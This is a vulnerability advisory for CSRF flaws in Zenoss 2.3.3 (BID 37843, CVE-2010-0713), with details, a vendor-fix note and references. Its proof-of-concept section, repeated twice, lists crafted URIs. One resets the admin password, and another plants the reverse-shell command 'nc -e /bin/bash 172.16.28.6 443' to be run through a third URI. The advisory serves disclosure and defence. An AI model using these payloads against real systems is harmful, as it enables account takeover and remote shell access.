Zenoss Multiple Cross Site Request Forgery Vulnerabilities
BID:37843
Info
Zenoss Multiple Cross Site Request Forgery Vulnerabilities
| Bugtraq ID: | 37843 |
| Class: | Design Error |
| CVE: |
CVE-2010-0713 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 18 2010 12:00AM |
| Updated: | Apr 13 2015 09:03PM |
| Credit: | Adam Baldwin |
| Vulnerable: |
Zenoss Zenoss Enterprise 2.3.3 |
| Not Vulnerable: | |
Discussion
Zenoss Multiple Cross Site Request Forgery Vulnerabilities
Zenoss is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, execute arbitrary commands, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
Zenoss 2.3.3 is vulnerable; prior versions are also vulnerable.
Zenoss is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, execute arbitrary commands, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
Zenoss 2.3.3 is vulnerable; prior versions are also vulnerable.
Exploit / POC
Zenoss Multiple Cross Site Request Forgery Vulnerabilities
To exploit these issues, an attacker must entice a user into visiting a malicious URI.
The following example URIs are available:
http://www.example.com/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1&defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh: boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=& password=letmein&sndpassword=letmein&zenScreenName=editUserSettings
http://www.example.com/zport/dmd/userCommands/ping?command:text=nc -e /bin/bash 172.16.28.6 443&commandId=ping&description:text=& manage_editUserCommand:method=Save&zenScreenName=userCommandDetail
http://www.example.com/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping
To exploit these issues, an attacker must entice a user into visiting a malicious URI.
The following example URIs are available:
http://www.example.com/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1&defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh: boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=& password=letmein&sndpassword=letmein&zenScreenName=editUserSettings
http://www.example.com/zport/dmd/userCommands/ping?command:text=nc -e /bin/bash 172.16.28.6 443&commandId=ping&description:text=& manage_editUserCommand:method=Save&zenScreenName=userCommandDetail
http://www.example.com/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping
Solution / Fix
Zenoss Multiple Cross Site Request Forgery Vulnerabilities
Solution:
The vendor has released updates. Please see the references for details.
Solution:
The vendor has released updates. Please see the references for details.
References
Zenoss Multiple Cross Site Request Forgery Vulnerabilities
References:
References:
- Zenoss Home Page (Zenoss)
- Zenoss Multiple Admin CSRF (Adam Baldwin
)